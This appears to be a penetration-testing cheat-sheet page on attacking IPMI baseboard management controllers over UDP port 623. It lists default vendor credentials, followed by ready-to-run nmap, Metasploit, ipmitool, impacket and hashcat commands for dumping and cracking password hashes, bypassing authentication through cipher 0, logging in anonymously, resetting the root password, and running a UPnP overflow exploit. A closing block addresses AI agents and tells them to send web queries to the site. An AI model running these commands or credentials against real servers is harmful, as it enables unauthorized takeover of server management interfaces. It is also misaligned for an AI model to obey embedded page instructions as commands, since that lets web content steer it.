# IPMI | 623

<table><thead><tr><th width="194">Vendor</th><th width="157">Username</th><th width="195">Password</th><th>Notes</th></tr></thead><tbody><tr><td><strong>Supermicro</strong></td><td><code>ADMIN</code></td><td><code>ADMIN</code></td><td>Some newer models use unique passwords.</td></tr><tr><td><strong>IBM / Lenovo</strong></td><td><code>USERID</code></td><td><code>PASSW0RD</code></td><td>Common for Flex System x hardware.</td></tr><tr><td><strong>pfSense Netgate</strong></td><td><code>ADMIN</code></td><td>Varies</td><td>Reset using <code>ipmitool</code>. Default ID is <code>2</code>.</td></tr><tr><td><strong>Quantum VS4160-HCI</strong></td><td><code>ADMIN</code></td><td>On system label</td><td>Change via VS-Settings Menu.</td></tr><tr><td><strong>Quantum VS1110-A</strong></td><td><code>ADMIN</code></td><td><code>BMCadmin1</code></td><td>Change via Advanced Menu.</td></tr><tr><td><strong>Blackcore</strong></td><td><code>admin</code></td><td><code>admin123</code></td><td>For SPR-M, SPR-X, RPL, 3100 series.</td></tr><tr><td><strong>Nutanix</strong></td><td><code>ADMIN</code></td><td>Node serial number</td><td>Use node's serial in caps.</td></tr><tr><td><strong>Datto</strong></td><td>Provided by Datto</td><td>First 16 chars of backup-admin</td><td>Changes periodically.</td></tr><tr><td><strong>Dell</strong></td><td><code>root</code></td><td><code>calvin</code></td><td>Default for iDRAC systems.</td></tr><tr><td><strong>Cisco</strong></td><td><code>admin</code></td><td><code>password</code></td><td>Common for UCS servers.</td></tr><tr><td><strong>HP / HPE</strong></td><td><code>Administrator</code></td><td>Unique on system label</td><td>Often randomized for iLO.</td></tr></tbody></table>

* Enumerations

```bash
## ------------------| Version Detection
sudo nmap -sU --script ipmi-version -p 623 $IP
use auxiliary/scanner/ipmi/ipmi_version
```

* Dumping Hashes

```bash
## ------------------| Using Metasploit
use auxiliary/scanner/ipmi/ipmi_dumphashes

## ------------------| Using ipmitool
ipmitool -I lanplus -H $IP -U <USERNAME> -P <PASSWORD> user list 1

## ------------------| Using impacket
ipmi_hash_dump.py $IP -u <USERNAME> -p <PASSWORD>
rakp.py $IP
```

* Vulnerabilities

```bash
## ------------------| Change password for root user
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user set password 2 newpassword 
       
## ------------------| IPMI Authentication Bypass via Cipher 0
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list #C 0 to dump a list of users.                     

## ------------------| IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
use auxiliary/scanner/ipmi/ipmi_dumphashes
set OUTPUT_HASHCAT_FILE cat-hash
set OUTPUT_JOHN_FILE john-hash
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list

## ------------------| IPMI Anonymous Authentication
ipmitool -I lanplus -H 10.10.11.124 -U '' -P '' user list

## ------------------| Supermicro IPMI UPnP
use exploit/multi/upnp/libupnp_ssdp_overflow

## ------------------| Crack HP iLO default password
hashcat -m 7300 hases.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/udp/623-ipmi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.